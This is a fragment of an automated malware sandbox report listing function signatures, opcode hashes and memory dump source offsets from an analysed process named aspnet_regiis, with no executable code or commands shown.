                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: MetricsSystem
                                                                                    • String ID:
                                                                                    • API String ID: 4116985748-3916222277
                                                                                    • Opcode ID: cc2b7cf49b2b1a9bb68014eabd22a7e378c8fa801ba483873dc07e7f0f1d63c6
                                                                                    • Instruction ID: 9bd66cf24d2a324038b4fa883827832040c1a0c3c192c78a924babc38a88515b
                                                                                    • Opcode Fuzzy Hash: cc2b7cf49b2b1a9bb68014eabd22a7e378c8fa801ba483873dc07e7f0f1d63c6
                                                                                    • Instruction Fuzzy Hash: B5815CB0519384CFD7A0DF66D98869EBBE0FB86308F50891DE5D88B350DBB49948CF52
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit
                                                                                    • String ID: `$b$d$f$h$j$l$n$x$|$~
                                                                                    • API String ID: 2610073882-2392625418
                                                                                    • Opcode ID: 8a14511e7dd0b113b3cf848f91f09ed46ee9b584c0d9d89c44a92ea925dc6c5f
                                                                                    • Instruction ID: bb57289384ba1933cfdc1db6292ff4004c5a2e8f29cfd5b94dcd507a6af7d78b
                                                                                    • Opcode Fuzzy Hash: 8a14511e7dd0b113b3cf848f91f09ed46ee9b584c0d9d89c44a92ea925dc6c5f
                                                                                    • Instruction Fuzzy Hash: 01414B71208B81CFD725CF3CC884646BFA2AB66224F18869CD8E54F3EAD3B5D415C762
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit
                                                                                    • String ID: `$b$d$f$h$j$l$n$x$|$~
                                                                                    • API String ID: 2610073882-2392625418
                                                                                    • Opcode ID: c3c58f8f949b61a753d25dd5c836e9efce67e39a6ef37e1c54018799476b3181
                                                                                    • Instruction ID: 21453d79e6c13f313d9054b6be13ee7522a82d7b472f14198040231700667a8d
                                                                                    • Opcode Fuzzy Hash: c3c58f8f949b61a753d25dd5c836e9efce67e39a6ef37e1c54018799476b3181
                                                                                    • Instruction Fuzzy Hash: 87410860208B818FD725CF3CC898716BFE2AB56224F08869CE8E58F3D6C679D515C762
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                                                                                    • Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: !$0
                                                                                    • API String ID: 3664257935-301933775
                                                                                    • Opcode ID: cbe67722457708e4f1046fef76ba680a56efa97a6f3aff33a9cc327da43d1909
                                                                                    • Instruction ID: 784ef9423cf328d508c380bc3116fa9ae29ab6646c72d858ec87cc29e1edf46f
                                                                                    • Opcode Fuzzy Hash: cbe67722457708e4f1046fef76ba680a56efa97a6f3aff33a9cc327da43d1909
                                                                                    • Instruction Fuzzy Hash: E18158315083808BC7289B288841B6AFFE2FFD6304F28867ED8D6DB391D638C9458756